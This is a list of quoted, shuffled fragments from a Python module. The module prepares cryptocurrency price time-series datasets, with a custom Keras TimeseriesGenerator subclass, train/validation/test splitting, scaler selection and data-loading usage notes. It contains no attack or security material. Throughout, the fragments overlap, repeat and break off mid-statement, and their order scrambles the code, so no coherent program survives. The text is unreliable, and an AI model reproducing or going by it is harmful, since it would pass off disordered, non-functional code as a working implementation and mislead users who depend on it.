"df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size",
"targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler",
"self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape",
"sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows =",
"pairs to load time_intervals = None -> Use all timeframes directories for loading",
"+ self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen =",
"\"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler",
"= stride self.start_index = start_index + length self.overlap = overlap if end_index is",
"reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if",
") return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate,",
"import pandas as pd from typing import Tuple from sklearn.preprocessing import StandardScaler from",
"= self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data)",
"from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import",
"self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if",
"from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from",
"self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index:",
"\"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr,",
"import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import",
"samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1,",
"import datetime import pandas as pd from typing import Tuple from sklearn.preprocessing import",
"= '' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train =",
"def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}'",
"DSProfile): \"\"\" Getting object with OHLCV data (symbols and timeframes). All data with",
"def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size)",
"for row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row",
"self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None",
"sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1,",
"all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes",
"end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None",
"+ self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap",
"stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data,",
"be' + ' of same length. ' 'Data length is {}'.format(len(data)) + '",
"\"\"\" Using generator 1 time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data,",
"this datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes directory \"\"\" loaded_crypto_data",
"= '2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None -> Use",
"Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset =",
"sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing",
"df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data,",
"size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride * index) rows =",
"DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight:",
"Using generator 1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data,",
"sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data",
"+ self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size)",
"else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0:",
"with chosen period loaded to memory Args: loader (DataLoad): object with data Returns:",
"def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else:",
"return self.dataset else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name =",
"= None -> Use until [:-1] of historical data end_period = '2021-12-05 23:59:59'",
"pass def calc_shape(self): index = 0 i = (self.start_index + self.batch_size * self.stride",
"-> Use from this datetimeindex end_period = None -> Use until [:-1] of",
"batch_size) if len(data) != len(targets): raise ValueError('Data and targets have to be' +",
"loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile()",
"-> Use from [0:] of historical data start_period = '2021-09-01 00:00:00' -> Use",
"self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df =",
"end_index is None: end_index = len(data) - 1 self.end_index = end_index self.shuffle =",
"np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1, ...], targets return",
"pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol =",
"pass def get_train(self): if (self.x_Train is not None) and (self.y_Train is not None):",
"source_directory=\"../source_root\" -> Use this directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None,",
"and targets have to be' + ' of same length. ' 'Data length",
"+ length self.overlap = overlap if end_index is None: end_index = len(data) -",
"for dataset creation for dataset configuration we are using DSConstants dataclass (profile) \"\"\"",
"self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error:",
"= self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler =",
"y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__",
"(df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes:",
"= object self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape =",
"(df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0:",
"1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) #",
"sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\":",
"All data with chosen period loaded to memory Args: loader (DataLoad): object with",
"y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler =",
"self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index,",
"> 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets,",
"sampling_rate self.stride = stride self.start_index = start_index + length self.overlap = overlap if",
"self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for",
"x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return",
"sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler",
"self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len +",
"Usage for DataLoad class ------------------------ pairs_symbol = None -> Use all pairs in",
"test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :]",
"self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df =",
"-> Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use",
"time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data,",
"(DataLoad): object with data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile",
"import sys import time import copy import pytz import numpy as np import",
"from this list to load start_period = None -> Use from [0:] of",
"msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check",
"import copy import pytz import numpy as np import datetime import pandas as",
"+ df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len,",
"DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df =",
"y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test",
"sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return",
"= end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape =",
"tf from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures,",
"+= overlap self.data = data self.targets = targets self.length = length self.sampling_rate =",
"plt import seaborn as sns import tensorflow as tf from dataclasses import dataclass",
"(class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def",
"stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data,",
"self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet:",
"self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len =",
"start_index += overlap self.data = data self.targets = targets self.length = length self.sampling_rate",
"\"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using",
"x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] )",
"= TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self):",
"x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:,",
"import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import",
"+ self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len",
":] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self,",
"Use until [:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use until",
"RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)",
"samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape",
"+ 1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride * index)",
"path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol",
"sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return",
"if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone / 3600",
"= self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows",
"-> Use all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] ->",
"import numpy as np import datetime import pandas as pd from typing import",
"calc_shape(self): index = 0 i = (self.start_index + self.batch_size * self.stride * index)",
"self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if",
"= self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self,",
"from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import",
"be left to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape =",
"import seaborn as sns import tensorflow as tf from dataclasses import dataclass from",
"y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :]",
"= len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse",
"if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df =",
"self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is",
"ValueError('Data and targets have to be' + ' of same length. ' 'Data",
"self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val is not",
"self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len",
"self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap -",
"not None) and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\"",
"* self.stride * index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index",
":] return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len =",
"pairs_symbol = None -> Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\",",
"reverse self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i",
"(self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not",
"val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\"",
"int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len,",
"def get_test(self): if (self.x_Test is not None) and (self.y_Test is not None): return",
"if (self.x_Val is not None) and (self.y_Val is not None): return self.x_Val, self.y_Val",
"import pytz import numpy as np import datetime import pandas as pd from",
"not None) and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if",
"sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing",
"{}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap",
"data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset",
"else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes)",
"end_period = None -> Use until [:-1] of historical data end_period = '2021-12-05",
"offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1,",
"self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for",
"= 0 i = (self.start_index + self.batch_size * self.stride * index) rows =",
"self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen",
"self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend()",
"time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\"",
"not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and",
"x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len",
"scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values",
"+ self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :]",
"list to load start_period = None -> Use from [0:] of historical data",
"self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if",
"::-1, ...], targets return samples, targets @dataclass class DataSet: def __init__(self): self.name: str",
"targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data):",
"check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr):",
"None pass def get_train(self): if (self.x_Train is not None) and (self.y_Train is not",
"f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None,",
"% (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i",
"datetime import pandas as pd from typing import Tuple from sklearn.preprocessing import StandardScaler",
"StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder",
"save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------",
"get_train(self): if (self.x_Train is not None) and (self.y_Train is not None): return self.x_Train,",
"have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data,",
"length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index +=",
"self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride",
"' while target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >=",
"self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub()",
"y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for",
"self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile",
"for x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass",
"(profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV",
"time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen",
"{}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap >= length: raise",
"def get_val(self): if (self.x_Val is not None) and (self.y_Val is not None): return",
"len(data) != len(targets): raise ValueError('Data and targets have to be' + ' of",
"targets self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index",
"generator 1 time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen",
"(\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load time_intervals = None ->",
"self.stride = stride self.start_index = start_index + length self.overlap = overlap if end_index",
"dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010",
"None self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen = None",
"y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data =",
"== \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown",
"' 'is disallowed, as no part of the sequence ' 'would be left",
"None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as",
"LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer",
"from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour",
"= None self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler =",
"create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg",
"= self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data):",
"self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None",
"train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :]",
":] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data =",
"= np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape =",
"pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is",
"+ ' of same length. ' 'Data length is {}'.format(len(data)) + ' while",
"= time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\"",
"None self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val = None",
"self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:,",
"disallowed, as no part of the sequence ' 'would be left to be",
"- (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len +",
"load time_intervals = None -> Use all timeframes directories for loading (with pairs_symbols)",
"= y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1",
"\"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler",
"x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data",
"None self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler = object",
"\"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows",
"def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else:",
"= np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples =",
"None -> Use all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m']",
"offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data,",
"overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length,",
"data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\"",
"self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :]",
"is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation",
"self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\" self.dataset.x_Test,",
"= self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df =",
"length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue",
"self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to",
"rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass class",
"overlap self.data = data self.targets = targets self.length = length self.sampling_rate = sampling_rate",
"RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder",
